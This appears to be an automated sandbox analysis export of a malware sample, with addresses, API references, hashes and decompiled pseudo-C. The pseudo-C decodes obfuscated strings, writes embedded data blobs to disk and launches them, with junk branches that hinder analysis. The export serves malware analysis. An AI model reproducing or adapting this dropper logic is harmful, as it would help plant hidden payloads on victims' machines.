0x0040384a
0x00403852
0x0040385a
0x00403862
0x0040386a
0x00403872
0x00403883
0x004038bf
0x004038de
0x0040390e
0x0040394d
0x00403958
0x00403963
0x0040396e
0x00403975
0x0040397d
0x00403985
0x0040398d
0x00403995
0x0040399d
0x004039ae
0x004039ea
0x00403a09
0x00403a39
0x00403a69
0x00403a6e
0x00403a78
0x00403a83
0x00403a8e
0x00403a99
0x00403aa4
0x00403aa4
0x0040381c
0x00403aab
0x00403ab3
0x00403abb
0x00403af0
0x00403af8
0x00403b00
0x00403b08
0x00403b3f
0x00403b46
0x00403b4e
0x00403b56
0x00403b8d
0x00403b9d
0x00403b9d
0x00403ba8
0x00403bb8
0x00403bc8
0x00403bd3
0x00403bda
0x00403bdb
0x00403be7
0x00403bf2
0x00403c02
0x00403c0d
0x00403c18
0x00403c23
0x00403c33
0x00403c43
0x00403c4e
0x00403c55
0x00403c56
0x00403c62
0x00403c6d
0x00403c7d
0x00403c88
0x00403c93
0x00403c9e
0x00403ca5
0x00403cad
0x00403cb5
0x00403cec
0x00403cf3
0x00403cfb
0x00403d03
0x00403d3a
0x00403d41
0x00403d49
0x00403d51
0x00403d88
0x00403d8f
0x00403d97
0x00403d9f
0x00403dd6
0x00403ddd
0x00403de5
0x00403ded
0x00403e24
0x00403e36
0x00403e41
0x00403e48
0x00403e50
0x00403e58
0x00403e64
0x00403e65
0x00403e71
0x00403ea8
0x00403ead
0x00403ebb
0x00403ec6
0x00403ed1
0x00403edc
0x00403ee7
0x00403eec
0x00403efd

APIs

task.LIBCPMTD ref: 004033B4
task.LIBCPMTD ref: 004033BF
task.LIBCPMTD ref: 004033CA
task.LIBCPMTD ref: 00403470
task.LIBCPMTD ref: 0040347B
task.LIBCPMTD ref: 00403486

Part of subcall function 00406CE0: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00406D06

__aulldiv.LIBCMT ref: 00403530
__aulldiv.LIBCMT ref: 0040353E
task.LIBCPMTD ref: 004035DC
task.LIBCPMTD ref: 004035E7
task.LIBCPMTD ref: 004035F2

Part of subcall function 004025E0: task.LIBCPMTD ref: 004026BD
Part of subcall function 004025E0: task.LIBCPMTD ref: 004026C5

task.LIBCPMTD ref: 00403720
task.LIBCPMTD ref: 0040372B
task.LIBCPMTD ref: 00403736
task.LIBCPMTD ref: 00403958
task.LIBCPMTD ref: 00403963
task.LIBCPMTD ref: 0040396E
task.LIBCPMTD ref: 00403A83
task.LIBCPMTD ref: 00403A8E
task.LIBCPMTD ref: 00403A99
task.LIBCPMTD ref: 00403C0D
task.LIBCPMTD ref: 00403C18
task.LIBCPMTD ref: 00403C23

Part of subcall function 004021E0: task.LIBCPMTD ref: 00402254

task.LIBCPMTD ref: 00403C88
task.LIBCPMTD ref: 00403C93
task.LIBCPMTD ref: 00403C9E

Part of subcall function 00412010: shared_ptr.LIBCMTD ref: 00412083

Part of subcall function 00406100: task.LIBCPMTD ref: 0040618C

task.LIBCPMTD ref: 00403EBB
task.LIBCPMTD ref: 00403EC6
task.LIBCPMTD ref: 00403ED1
task.LIBCPMTD ref: 00403EDC
task.LIBCPMTD ref: 00403EE7

Strings

%0A, xrefs: 00403C28
%20, xrefs: 00403BAD

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$__aulldiv$GlobalMemoryStatusshared_ptr
String ID: %0A$%20
API String ID: 3697777849-3145689006
Opcode ID: 6c73a6c47137a8ea7820ddc60bbf59b0aaeb5165667682bc483f14de459d5632
Instruction ID: db55be80b05381e159f000fa1904545088c0be35ebd00b611a507c6bf41036cb
Opcode Fuzzy Hash: 6c73a6c47137a8ea7820ddc60bbf59b0aaeb5165667682bc483f14de459d5632
Instruction Fuzzy Hash: B362D4B19151A85ADB25E7768C51BEFBBB85F49204F0440EEB14DB2183EE385BC4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 25.6, APIs: 13, Strings: 1, Instructions: 1096
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401000(void* __edi, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				char _v284;
				char _v1308;
				char _v1332;
				char _v1356;
				char _v1380;
				char _v1404;
				char _v1428;
				char _v1452;
				char _v1476;
				char _v1500;
				char _v1524;
				char _v1548;
				char _v1572;
				char _v1596;
				char _v1620;
				char _v1644;
				char _v1660;
				char _v1676;
				char _v1692;
				char _v1708;
				char _v1724;
				char _v1740;
				char _v1756;
				char _v1772;
				char _v1788;
				char _v1804;
				char _v1820;
				char _v1836;
				char _v1852;
				char _v1868;
				char _v1900;
				char _v1932;
				char _v1964;
				char _v2028;
				char _v2124;
				char _v2220;
				char _v2380;
				signed char _v2381;
				signed char _v2382;
				signed int _v2383;
				signed char _v2384;
				signed char _v2385;
				signed char _v2386;
				signed int _v2387;
				signed char _v2388;
				signed char _v2389;
				signed char _v2390;
				signed int _v2391;
				signed char _v2392;
				signed int _v2393;
				signed char _v2394;
				signed char _v2395;
				signed char _v2396;
				signed int _v2397;
				signed int _v2398;
				signed char _v2399;
				signed char _v2400;
				signed char _v2401;
				signed int _v2402;
				signed char _v2403;
				signed char _v2404;
				signed char _v2405;
				signed int _v2406;
				signed char _v2407;
				signed int _v2408;
				signed char _v2409;
				signed char _v2410;
				signed char _v2411;
				signed int _v2412;
				signed int _v2413;
				signed char _v2414;
				signed char _v2415;
				signed int _v2416;
				signed char _v2417;
				signed char _v2418;
				signed char _v2419;
				signed char _v2420;
				signed int _v2421;
				signed char _v2422;
				signed int _v2423;
				signed char _v2424;
				signed char _v2425;
				signed int _v2426;
				signed char _v2427;
				signed char _v2428;
				signed int _v2429;
				signed char _v2430;
				signed int _v2431;
				signed char _v2432;
				signed int _v2433;
				signed char _v2434;
				signed int _v2435;
				signed char _v2436;
				signed char _v2437;
				signed char _v2438;
				signed char _v2439;
				signed int _v2440;
				signed char _v2441;
				signed int _v2442;
				signed char _v2443;
				signed char _v2444;
				signed char _v2445;
				signed int _v2446;
				signed int _v2447;
				intOrPtr _v2452;
				char _v2453;
				char _v2454;
				char _v2455;
				char _v2456;
				char _v2457;
				char _v2458;
				char _v2459;
				char _v2460;
				char _v2461;
				char _v2462;
				char _v2463;
				intOrPtr _v2468;
				char _v2469;
				char _v2470;
				char _v2492;
				char* _v2496;
				char _v2500;
				char _v2504;
				char _v2508;
				intOrPtr _v2512;
				intOrPtr _v2516;
				char _v2520;
				char _v2524;
				char _v2528;
				char _v2532;
				char _v2536;
				char _v2540;
				char _v2544;
				char _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2564;
				char _v2568;
				char _v2572;
				char _v2576;
				char _v2580;
				char _v2584;
				char _v2588;
				char _v2592;
				char _v2596;
				char _v2600;
				char _v2604;
				char _v2608;
				char _v2612;
				char _v2616;
				intOrPtr _v2620;
				char _v2624;
				char _v2628;
				char _v2632;
				char _v2636;
				char _v2640;
				char _v2644;
				char _v2656;
				char _v2676;
				char _v2692;
				char _v2708;
				char _v2724;
				char _v2740;
				char _v2756;
				char _v2772;
				char _v2788;
				char _v2804;
				intOrPtr _v2820;
				char _v2840;
				void* __ebx;
				void* __esi;
				signed int _t357;
				signed char _t387;
				void* _t390;
				void* _t525;
				signed char _t582;
				void* _t655;
				void* _t1014;
				void* _t1015;
				void* _t1018;
				signed int _t1021;
				void* _t1023;
				signed int _t1026;
				void* _t1027;
				void* _t1028;
				void* _t1029;
				void* _t1030;
				void* _t1034;
				void* _t1035;
				void* _t1036;
				void* _t1037;
				void* _t1038;
				void* _t1041;
				void* _t1043;
				void* _t1044;
				void* _t1045;
				void* _t1046;
				void* _t1047;
				void* _t1049;
				void* _t1050;
				void* _t1052;

				L0:
				do {
					do {
						do {
							L0:
							_t1014 = __edi;
							_t679 = _t1023;
							_t1026 = (_t1023 - 0x00000008 & 0xffffffe0) + 4;
							_v8 =  *((intOrPtr*)(_t1023 + 4));
							_t1021 = _t1026;
							_t1027 = _t1026 - 0xb1c;
							_t357 =  *0x4c61a4; // 0x8656a166
							_v16 = _t357 ^ _t1021;
							_push(_t1015);
							_v2556 =  &_v2840;
							E00406D10( &_v2470, __eflags,  &_v2556); // executed
							_t1062 = _v2820 - 2;
							if(_v2820 <= 2) {
								_v2568 = E0042976F( &_v2470, _t1062);
								E00406970( &_v2453, _t1062,  &_v2568);
							}
							_v2429 = 0;
							_v2430 = 0;
							_v2431 = 0;
							_v2572 = E0041B420(E00404F00( &_v1820, _v2431 & 0x000000ff, _v2431 & 0x000000ff, _v2430 & 0x000000ff, _v2429 & 0x000000ff), _v2431 & 0x000000ff);
							E004069F0( &_v2460, _t1062,  &_v2572);
							_v2432 = 0;
							_v2433 = 0;
							_v2434 = 0;
							_v2576 = E0041B420(E00405140( &_v1804, _v2433 & 0x000000ff, _v2434 & 0x000000ff, _v2433 & 0x000000ff, _v2432 & 0x000000ff), _v2433 & 0x000000ff);
							E00406A20( &_v2454, _t1062,  &_v2576);
							_v2435 = 0;
							_v2436 = 0;
							_v2437 = 0;
							_v2580 = E0041B420(E00405830( &_v1788, _v2435 & 0x000000ff, _v2437 & 0x000000ff, _v2436 & 0x000000ff, _v2435 & 0x000000ff), _v2435 & 0x000000ff);
							E00406A50( &_v2455, _t1062,  &_v2580); // executed
							if (0xffffffffffffff13 == 0xff) goto 0x841195;
							if (0xffffffffffffff13 != 0xff) goto 0x84119f;
							if (0xffffffffffffff13 == 0xff) goto 0x8411cf;
							if (0xffffffffffffff13 != 0xff) goto 0x8411bd;
							_v2438 = 0;
							_v2439 = 0;
							_v2440 = 0;
							_t387 = E00403170(_t679, _t1014, _t1015, E0041B420(E00404FD0( &_v1772, _v2440 & 0x000000ff, _v2440 & 0x000000ff, _v2439 & 0x000000ff, _v2438 & 0x000000ff), _v2440 & 0x000000ff)); // executed
							_t1028 = _t1027 + 4;
							if((_t387 & 0x000000ff) != 0) {
								_v2584 = 0;
								_v2441 = 0;
								_v2442 = 0;
								_v2443 = 0;
								_v2588 = E0041B540(E00404F50( &_v1900, _v2442 & 0x000000ff, _v2443 & 0x000000ff, _v2442 & 0x000000ff, _v2441 & 0x000000ff), _v2442 & 0x000000ff, _t1014, _t1015);
								E00406A80( &_v2456, 0,  &_v2588,  &_v2584);
							}
							_v2592 = 0x400;
							_v2596 =  &_v1308;
							_t390 = E00406B60( &_v2457, 0,  &_v2596,  &_v2592);
							_t1067 = _t390;
							if(_t390 == 0) {
								E00429715(E0042976F( &_v2457, _t1067));
							}
							if (0xffffffffffffff13 == 0xff) goto 0x8412ec;
							if (0xffffffffffffff13 != 0xff) goto 0x8412d6;
							if (0xffffffffffffff13 == 0xff) goto 0x8412fe;
							if (0xffffffffffffff13 != 0xff) goto 0x8412f4;
							if (0xffffffffffffff13 == 0xff) goto 0x841318;
							if (0xffffffffffffff13 != 0xff) goto 0x841312;
							_v2600 =  &_v284;
							_v2604 = 0;
							_v2608 = 0;
							_v2612 = 0x1c;
							_v2616 = 0;
							E00406C50( &_v2459, 0xffffffffffffff13 - 0xff,  &_v2616,  &_v2612,  &_v2608,  &_v2604,  &_v2600); // executed
							_v2444 = 0;
							_v2445 = 0;
							_v2446 = 0;
							E00406320(0xffffffffffffff13 - 0xff,  &_v1356,  &_v284, E00415310( &_v1548, 0xffffffffffffff13 - 0xff, E0041B420(E00405230( &_v1756, _v2446 & 0x000000ff, _v2446 & 0x000000ff, _v2445 & 0x000000ff, _v2444 & 0x000000ff), _v2446 & 0x000000ff)));
							_t1029 = _t1028 + 0xc;
							E00416980( &_v1548);
							if(0xffffffffffffff13 == 0xff) {
								continue;
							}
							L7:
							if (0xffffffffffffff13 != 0xff) goto 0x841402;
							if (0xffffffffffffff13 == 0xff) goto 0x841552;
							if (0xffffffffffffff13 != 0xff) goto 0x841420;
							E00415FA0( &_v2656);
							_push( &_v1356);
							_push( &_v2656); // executed
							E00402F60(_t1014, _t1015, 0xffffffffffffff13 - 0xff); // executed
							_t1030 = _t1029 + 8;
							if (0xffffffffffffff13 == 0xff) goto 0x84144d;
							if (0xffffffffffffff13 != 0xff) goto 0x84145f;
							if (0xffffffffffffff13 == 0xff) goto 0x841473;
							if (0xffffffffffffff13 != 0xff) goto 0x84147d;
							if (0xffffffffffffff13 == 0xff) goto 0x8415d9;
							if (0xffffffffffffff13 != 0xff) goto 0x84149b;
							_v2381 = 0;
							_v2496 =  &_v2656;
							_v2452 = E00417420(_v2496);
							_v2620 = E0041A400(_v2496);
							L9:
							while(_v2452 != _v2620) {
								_v2468 = _v2452;
								_t1015 = E00420EE0(_v2468);
								if(_t1015 == E00420EE0( &_v1356) + 0x11) {
									_v2447 = 0;
									_v2382 = 0;
									_v2428 = 0;
									__eflags = E0041F8B0(_v2468, E0041B420(E00404EB0( &_v1740, _v2447 & 0x000000ff, _v2428 & 0x000000ff, _v2382 & 0x000000ff, _v2447 & 0x000000ff), _v2447 & 0x000000ff), 0) - 0xffffffff;
									if(__eflags != 0) {
										_v2624 = E0041AF80(_v2468);
										E00406D70( &_v2462, __eflags,  &_v2624);
										_v2381 = 1;
									}
								}
								_v2452 = _v2452 + 0x18;
							}
							L15:
							__eflags = 0xffffffffffffff13 - 0xff;
							if (0xffffffffffffff13 == 0xff) goto 0x8416f8;
							if (0xffffffffffffff13 != 0xff) goto 0x8415c2;
							E00414FA0( &_v2492, 0);
							_v2628 = 0;
							E004044D0( &_v2724,  &_v2628);
							E00421E70(_t679,  &_v2492, 0, _t1014, _t1015,  &_v2724);
							E00416950( &_v2724);
							_v2383 = 0;
							_v2384 = 0;
							_v2385 = 0;
							_v2632 = E0041B420(E00405970( &_v1724, _v2383 & 0x000000ff, _v2385 & 0x000000ff, _v2384 & 0x000000ff, _v2383 & 0x000000ff), _v2383 & 0x000000ff);
							E004045D0( &_v2708,  &_v2632);
							E00421E70(_t679,  &_v2492,  &_v2632, _t1014, _t1015,  &_v2708);
							E00416950( &_v2708);
							_v2386 = 0;
							_v2387 = 0;
							_v2388 = 0;
							_v2636 = E0041B540(E00405AB0( &_v1932, _v2387 & 0x000000ff, _v2388 & 0x000000ff, _v2387 & 0x000000ff, _v2386 & 0x000000ff), _v2387 & 0x000000ff, _t1014, _t1015);
							E004045D0( &_v2692,  &_v2636);
							E00421E70(_t679,  &_v2492,  &_v2692, _t1014, _t1015,  &_v2692);
							E00416950( &_v2692);
							_v2389 = 0;
							_v2390 = 0;
							_v2391 = 0;
							_v2640 = E0041B730(E00404A50( &_v2028, _v2391 & 0x000000ff, _v2391 & 0x000000ff, _v2390 & 0x000000ff, _v2389 & 0x000000ff), _v2391 & 0x000000ff, _t1014, _t1015);
							E004045D0( &_v2676,  &_v2640);
							E00421E70(_t679,  &_v2492, _v2391 & 0x000000ff, _t1014, _t1015,  &_v2676);
							E00416950( &_v2676);
							__eflags = 0xffffffffffffff13 - 0xff;
							if (0xffffffffffffff13 == 0xff) goto 0x84177d;
							if (0xffffffffffffff13 != 0xff) goto 0x84178b;
							_v2644 = 0;
							E004044D0( &_v2804,  &_v2644);
							E00421E70(_t679,  &_v2492,  &_v2644, _t1014, _t1015,  &_v2804);
							E00416950( &_v2804);
							_v2392 = 0;
							_v2393 = 0;
							_v2394 = 0;
							_v2564 = E0041B420(E004051E0( &_v1708, _v2393 & 0x000000ff, _v2394 & 0x000000ff, _v2393 & 0x000000ff, _v2392 & 0x000000ff), _v2393 & 0x000000ff);
							E004045D0( &_v2788,  &_v2564);
							E00421E70(_t679,  &_v2492,  &_v2788, _t1014, _t1015,  &_v2788);
							E00416950( &_v2788);
							_v2395 = 0;
							_v2396 = 0;
							_v2397 = 0;
							_v2500 = E0041B540(E004057B0( &_v1964, _v2397 & 0x000000ff, _v2397 & 0x000000ff, _v2396 & 0x000000ff, _v2395 & 0x000000ff), _v2397 & 0x000000ff, _t1014, _t1015);
							E004045D0( &_v2740,  &_v2500);
							E00421E70(_t679,  &_v2492, _v2397 & 0x000000ff, _t1014, _t1015,  &_v2740);
							E00416950( &_v2740);
							_v2398 = 0;
							_v2399 = 0;
							_v2400 = 0;
							_v2504 = E0041BA30(E00405600( &_v2124, _v2398 & 0x000000ff, _v2400 & 0x000000ff, _v2399 & 0x000000ff, _v2398 & 0x000000ff), _v2398 & 0x000000ff, _t1014, _t1015);
							E004045D0( &_v2772,  &_v2504);
							E00421E70(_t679,  &_v2492,  &_v2504, _t1014, _t1015,  &_v2772);
							E00416950( &_v2772);
							_v2401 = 0;
							_v2402 = 0;
							_v2403 = 0;
							_v2508 = E0041B420(E00405760( &_v1692, _v2402 & 0x000000ff, _v2403 & 0x000000ff, _v2402 & 0x000000ff, _v2401 & 0x000000ff), _v2402 & 0x000000ff);
							E004045D0( &_v2756,  &_v2508);
							E00421E70(_t679,  &_v2492,  &_v2756, _t1014, _t1015,  &_v2756);
							E00416950( &_v2756);
							__eflags = 0xffffffffffffff13 - 0xff;
							if (0xffffffffffffff13 == 0xff) goto 0x8419d4;
							if (0xffffffffffffff13 != 0xff) goto 0x8419be;
							__eflags = 0xffffffffffffff13 - 0xff;
							if (0xffffffffffffff13 == 0xff) goto 0x8419e6;
							if (0xffffffffffffff13 != 0xff) goto 0x8419dc;
							__eflags = 0xffffffffffffff13 - 0xff;
							if (0xffffffffffffff13 == 0xff) goto 0x841b2c;
							if (0xffffffffffffff13 != 0xff) goto 0x8419fa;
							_v2404 = 0;
							_v2405 = 0;
							_v2406 = 0;
							_v2512 = E0041B420(E00404EB0( &_v1676, _v2406 & 0x000000ff, _v2406 & 0x000000ff, _v2405 & 0x000000ff, _v2404 & 0x000000ff), _v2406 & 0x000000ff);
							_v2516 = E00406270( &_v1572,  &_v1356, E00402D30(_t679,  &_v1596, 0xe));
							E00406240(__eflags,  &_v1524, _v2516, _v2512);
							E00416980( &_v1572);
							E00416980( &_v1596);
							E0041CEE0(_t679,  &_v2492, _t1014, _t1015, __eflags,  &_v1428, 0xffffffff, 0x20, 0, 0);
							_t1034 = _t1030 + 0x20 - 0x18;
							_push(_t1034); // executed
							E00402C70(_t1014, _t1015, __eflags); // executed
							_t1035 = _t1034 + 0xffffffec;
							E00415230(_t1035,  &_v1428);
							_push( &_v1620);
							_t525 = E004022A0(_t679, _t1014);
							_t1036 = _t1035 + 0x34;
							E00416F00( &_v1428, _t525);
							E00416980( &_v1620);
							__eflags = 0xffffffffffffff13 - 0xff;
						} while (0xffffffffffffff13 == 0xff);
						L16:
						if (0xffffffffffffff13 != 0xff) goto 0x841b1b;
						__eflags = 0xffffffffffffff13 - 0xff;
						if (0xffffffffffffff13 == 0xff) goto 0x841b37;
						if (0xffffffffffffff13 != 0xff) goto 0x841b39;
						_t1037 = _t1036 - 0x18;
						E00415230(_t1037,  &_v1428);
						_t1038 = _t1037 - 0x18;
						E00415230(_t1038,  &_v1524); // executed
						E00402E60(0xffffffffffffff13 - 0xff); // executed
						__eflags = 0xffffffffffffff13 - 0xff;
						if (0xffffffffffffff13 == 0xff) goto 0x841b97;
						if (0xffffffffffffff13 != 0xff) goto 0x841b81;
						__eflags = 0xffffffffffffff13 - 0xff;
						if (0xffffffffffffff13 == 0xff) goto 0x841ba9;
						if (0xffffffffffffff13 != 0xff) goto 0x841b9f;
						__eflags = 0xffffffffffffff13 - 0xff;
						if (0xffffffffffffff13 == 0xff) goto 0x841bc3;
						if (0xffffffffffffff13 != 0xff) goto 0x841bbd;
						_v2407 = 0;
						_v2408 = 0;
						_v2409 = 0;
						E004062A0(__eflags,  &_v1404,  &_v1356, E0041B420(E00405280( &_v1660, _v2408 & 0x000000ff, _v2409 & 0x000000ff, _v2408 & 0x000000ff, _v2407 & 0x000000ff), _v2408 & 0x000000ff));
						E0042D840( &_v1404, E0041AF80( &_v1404)); // executed
						_t1041 = _t1038 + 0x40;
						__eflags = 0xffffffffffffff13 - 0xff;
					} while (0xffffffffffffff13 == 0xff);
					L17:
					if (0xffffffffffffff13 != 0xff) goto 0x841c48;
					__eflags = 0xffffffffffffff13 - 0xff;
					if (0xffffffffffffff13 == 0xff) goto 0x841c60;
					if (0xffffffffffffff13 != 0xff) goto 0x841c66;
					__eflags = 0xffffffffffffff13 - 0xff;
					if (0xffffffffffffff13 == 0xff) goto 0x841c9e;
					if (0xffffffffffffff13 != 0xff) goto 0x841c84;
					_v2410 = 0;
					_v2411 = 0;
					_v2412 = 0;
					E004062A0(__eflags,  &_v1500,  &_v1404, E0041B420(E00405460( &_v1644, _v2412 & 0x000000ff, _v2412 & 0x000000ff, _v2411 & 0x000000ff, _v2410 & 0x000000ff), _v2412 & 0x000000ff));
					_v2413 = 0;
					_v2414 = 0;
					_v2415 = 0;
					E004062A0(__eflags,  &_v1332,  &_v1404, E0041B420(E00404FD0( &_v1868, _v2413 & 0x000000ff, _v2415 & 0x000000ff, _v2414 & 0x000000ff, _v2413 & 0x000000ff), _v2413 & 0x000000ff));
					_t1043 = _t1041 + 0x18;
					__eflags = 0xffffffffffffff13 - 0xff;
				} while (0xffffffffffffff13 == 0xff);
				if (0xffffffffffffff13 != 0xff) goto 0x841d54;
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x841ea4;
				if (0xffffffffffffff13 != 0xff) goto 0x841d72;
				_t1044 = _t1043 - 0x18;
				E00415230(_t1044,  &_v1332); // executed
				_t582 = E00402DF0(_t679, _t1014, _t1015); // executed
				_t1045 = _t1044 + 0x18;
				__eflags = _t582 & 0x000000ff;
				if(__eflags != 0) {
					_v2520 = E0041AF80( &_v1332);
					E00406DA0( &_v2463, __eflags,  &_v2520);
				}
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x841dc5;
				if (0xffffffffffffff13 != 0xff) goto 0x841dd3;
				_v2416 = 0;
				_v2417 = 0;
				_v2418 = 0;
				_t1046 = _t1045 - 0x18;
				E00415310(_t1046, __eflags, E0041B420(E00405410( &_v1852, _v2416 & 0x000000ff, _v2418 & 0x000000ff, _v2417 & 0x000000ff, _v2416 & 0x000000ff), _v2416 & 0x000000ff));
				_t1047 = _t1046 - 0x18;
				E00415370(_t1047, __eflags, 0x44b000, 0x2bf98); // executed
				_push( &_v1476); // executed
				E004022A0(_t679, _t1014); // executed
				_v2419 = 0;
				_v2420 = 0;
				_v2421 = 0;
				_t1049 = _t1047 + 0x34 - 0x18;
				E00415310(_t1049, __eflags, E0041B420(E00405410( &_v1836, _v2421 & 0x000000ff, _v2421 & 0x000000ff, _v2420 & 0x000000ff, _v2419 & 0x000000ff), _v2421 & 0x000000ff));
				_t1050 = _t1049 - 0x18;
				E00415370(_t1050, __eflags, 0x476f98, 0x4f200); // executed
				_push( &_v1452); // executed
				E004022A0(_t679, _t1014); // executed
				_t1052 = _t1050 + 0x34 - 0x18;
				E00415230(_t1052,  &_v1476); // executed
				_t1053 = _t1052 - 0x18;
				E00415230(_t1052 - 0x18,  &_v1332); // executed
				E00402E60(__eflags); // executed
				E00415230(_t1053 + 0x30 - 0x18,  &_v1452); // executed
				E00415230(_t1053 + 0x30,  &_v1500); // executed
				E00402E60(__eflags); // executed
				_v2524 = 0;
				_v2560 = 0;
				_v2528 = 0;
				_v2532 = E0041AF80( &_v1332);
				_v2536 = 0;
				E00406BB0( &_v2461, __eflags,  &_v2536, "open",  &_v2532,  &_v2528,  &_v2560,  &_v2524); // executed
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x841f97;
				if (0xffffffffffffff13 != 0xff) goto 0x841f95;
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x8420e9;
				if (0xffffffffffffff13 != 0xff) goto 0x841fb3;
				_v2422 = 0;
				_v2423 = 0;
				_v2424 = 0;
				E00406350(__eflags,  &_v1380, E0041BA30(E00404B10( &_v2220, _v2423 & 0x000000ff, _v2424 & 0x000000ff, _v2423 & 0x000000ff, _v2422 & 0x000000ff), _v2423 & 0x000000ff, _t1014, _t1049),  &_v1332);
				_v2540 = 0;
				_v2544 = E0041AF80( &_v1380);
				E00406E20( &_v2458, __eflags,  &_v2544,  &_v2540); // executed
				_v2425 = 0;
				_v2426 = 0;
				_v2427 = 0;
				E00416FF0( &_v1380, E0041C010(E00404840( &_v2380, _v2426 & 0x000000ff, _v2427 & 0x000000ff, _v2426 & 0x000000ff, _v2425 & 0x000000ff), _v2426 & 0x000000ff, _t1014, _t1049));
				_v2548 = 0;
				_v2552 = E0041AF80( &_v1380);
				E00406DD0( &_v2469, __eflags,  &_v2552,  &_v2548); // executed
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x8420e2;
				if (0xffffffffffffff13 != 0xff) goto 0x8420e0;
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x842234;
				if (0xffffffffffffff13 != 0xff) goto 0x8420fe;
				__eflags = _v2381 & 0x000000ff;
				if(__eflags == 0) {
					E00403250(_t1014, __eflags); // executed
				}
				__eflags = 0xffffffffffffff13 - 0xff;
				if (0xffffffffffffff13 == 0xff) goto 0x84213a;
				if (0xffffffffffffff13 != 0xff) goto 0x84212c;
				E00416980( &_v1380);
				E00416980( &_v1452); // executed
				E00416980( &_v1476); // executed
				E00416980( &_v1332);
				E00416980( &_v1500);
				E00416980( &_v1404);
				E00416980( &_v1428);
				E00416980( &_v1524);
				E00416950( &_v2492);
				E00416CC0( &_v2656);
				_t655 = E00416980( &_v1356);
				_pop(_t1018);
				__eflags = _v16 ^ _t1021;
				return E00424900(_t655, _t679, _v16 ^ _t1021, 0, _t1014, _t1018);
			}

0x00401000
0x00401000
0x00401000
0x00401000
0x00401000
0x00401000
0x00401001
0x00401009
0x00401010
0x00401014
0x00401016
0x0040101c
0x00401023
0x00401026
0x0040102d
0x00401040
0x00401045
0x0040104c
0x00401053
0x00401066
0x00401066
0x0040106d
0x00401075
0x0040107d
0x004010ad
0x004010c0
0x004010c7
0x004010cf
0x004010d7
0x00401107
0x0040111a
0x00401121
0x00401129
0x00401131
0x00401161
0x00401174
0x00401187
0x00401191
0x004011a5
0x004011af
0x004011b7
0x004011bf
0x004011c7
0x004011f8
0x004011fd
0x00401205
0x00401207
0x00401213
0x0040121b
0x00401223
0x00401253
0x0040126d
0x0040126d
0x00401272
0x00401282
0x0040129c
0x004012a1
0x004012a3
0x004012ab
0x004012ab
0x004012be
0x004012c8
0x004012dc
0x004012e6
0x004012fa
0x00401304
0x00401310
0x00401316
0x00401320
0x0040132a
0x00401334
0x00401367
0x0040136e
0x00401376
0x0040137e
0x004013c9
0x004013ce
0x004013d7
0x004013ea
0x00000000
0x00000000
0x004013f0
0x004013f4
0x00401408
0x00401412
0x0040141e
0x00401429
0x00401430
0x00401431
0x00401436
0x00401447
0x00401451
0x00401465
0x0040146f
0x00401483
0x0040148d
0x00401493
0x004014a0
0x004014b1
0x004014c2
0x00000000
0x004014d9
0x004014f1
0x00401502
0x00401514
0x0040151a
0x00401522
0x0040152a
0x00401568
0x0040156b
0x00401578
0x0040158b
0x00401590
0x00401590
0x00401597
0x004014d3
0x004014d3
0x0040159c
0x004015a8
0x004015aa
0x004015b4
0x004015c2
0x004015c7
0x004015de
0x004015f0
0x004015fb
0x00401602
0x0040160a
0x00401612
0x00401642
0x00401655
0x00401667
0x00401672
0x00401679
0x00401681
0x00401689
0x004016b9
0x004016cc
0x004016de
0x004016e9
0x004016f0
0x004016f8
0x00401700
0x00401730
0x00401743
0x00401755
0x00401760
0x00401771
0x00401773
0x0040177d
0x00401783
0x0040179a
0x004017ac
0x004017b7
0x004017be
0x004017c6
0x004017ce
0x004017fe
0x00401811
0x00401823
0x0040182e
0x00401835
0x0040183d
0x00401845
0x00401875
0x00401888
0x0040189a
0x004018a5
0x004018ac
0x004018b4
0x004018bc
0x004018ec
0x004018ff
0x00401911
0x0040191c
0x00401923
0x0040192b
0x00401933
0x00401963
0x00401976
0x00401988
0x00401993
0x004019a4
0x004019a6
0x004019b0
0x004019c2
0x004019c4
0x004019ce
0x004019e0
0x004019e2
0x004019ec
0x004019f4
0x004019fc
0x00401a04
0x00401a34
0x00401a62
0x00401a7d
0x00401a8b
0x00401a96
0x00401ab0
0x00401ab5
0x00401ab8
0x00401ab9
0x00401abe
0x00401aca
0x00401ad5
0x00401ad6
0x00401adb
0x00401ae5
0x00401af0
0x00401b01
0x00401b01
0x00401b09
0x00401b0d
0x00401b1f
0x00401b21
0x00401b2b
0x00401b31
0x00401b3d
0x00401b42
0x00401b4e
0x00401b53
0x00401b67
0x00401b69
0x00401b73
0x00401b85
0x00401b87
0x00401b91
0x00401ba3
0x00401ba5
0x00401baf
0x00401bb7
0x00401bbf
0x00401bc7
0x00401c06
0x00401c1a
0x00401c1f
0x00401c2e
0x00401c2e
0x00401c36
0x00401c3a
0x00401c4c
0x00401c4e
0x00401c58
0x00401c6a
0x00401c6c
0x00401c76
0x00401c7e
0x00401c86
0x00401c8e
0x00401ccd
0x00401cd7
0x00401cdf
0x00401ce7
0x00401d26
0x00401d2b
0x00401d3a
0x00401d3a
0x00401d46
0x00401d58
0x00401d5a
0x00401d64
0x00401d6a
0x00401d76
